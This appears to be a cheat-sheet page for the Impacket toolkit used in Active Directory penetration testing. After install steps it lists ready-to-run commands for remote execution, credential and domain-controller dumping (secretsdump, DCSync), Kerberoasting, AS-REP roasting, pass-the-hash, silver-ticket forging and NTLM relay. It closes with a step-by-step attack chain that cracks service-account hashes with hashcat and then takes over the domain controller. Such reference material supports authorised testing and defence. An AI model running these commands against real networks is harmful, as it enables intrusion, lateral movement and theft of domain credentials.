Description
Impacket is a collection of Python classes for working with network protocols. It provides tools for SMB, MSRPC, Kerberos, LDAP, and more. Essential for Active Directory pentesting with tools like psexec, secretsdump, GetUserSPNs, etc.
Installation
BASH
pip install impacket
# Or
git clone https://github.com/fortra/impacket && cd impacket
pip install .Basic Usage
BASH
# Remote command execution
impacket-psexec domain/user:password@<IP>
impacket-wmiexec domain/user:password@<IP>
impacket-smbexec domain/user:password@<IP>
# Credential dump
impacket-secretsdump domain/user:password@<IP>
# Kerberoasting
impacket-GetUserSPNs domain/user:password -dc-ip <DC_IP> -requestAdvanced Usage
BASH
# Pass-the-Hash
impacket-psexec -hashes :NTLM_HASH domain/admin@<IP>
# DCSync
impacket-secretsdump -just-dc domain/admin:password@<DC_IP>
# AS-REP Roasting
impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip <DC_IP> -format hashcat
# Silver Ticket
impacket-ticketer -nthash <service_hash> -domain-sid <SID> -domain domain.local -spn <SPN> user
# NTLM Relay
impacket-ntlmrelayx -tf targets.txt -smb2support --sam
# MSSQL client
impacket-mssqlclient user:password@<IP>
# SMB client
impacket-smbclient domain/user:password@<IP>Common Workflows
BASH
# AD attack chain
impacket-GetUserSPNs domain/user:pass -request # Kerberoast
hashcat -m 13100 hashes.txt rockyou.txt # Crack
impacket-psexec domain/svc_account:cracked_pass@<IP> # Shell
impacket-secretsdump domain/admin:pass@<DC_IP> # Dump DC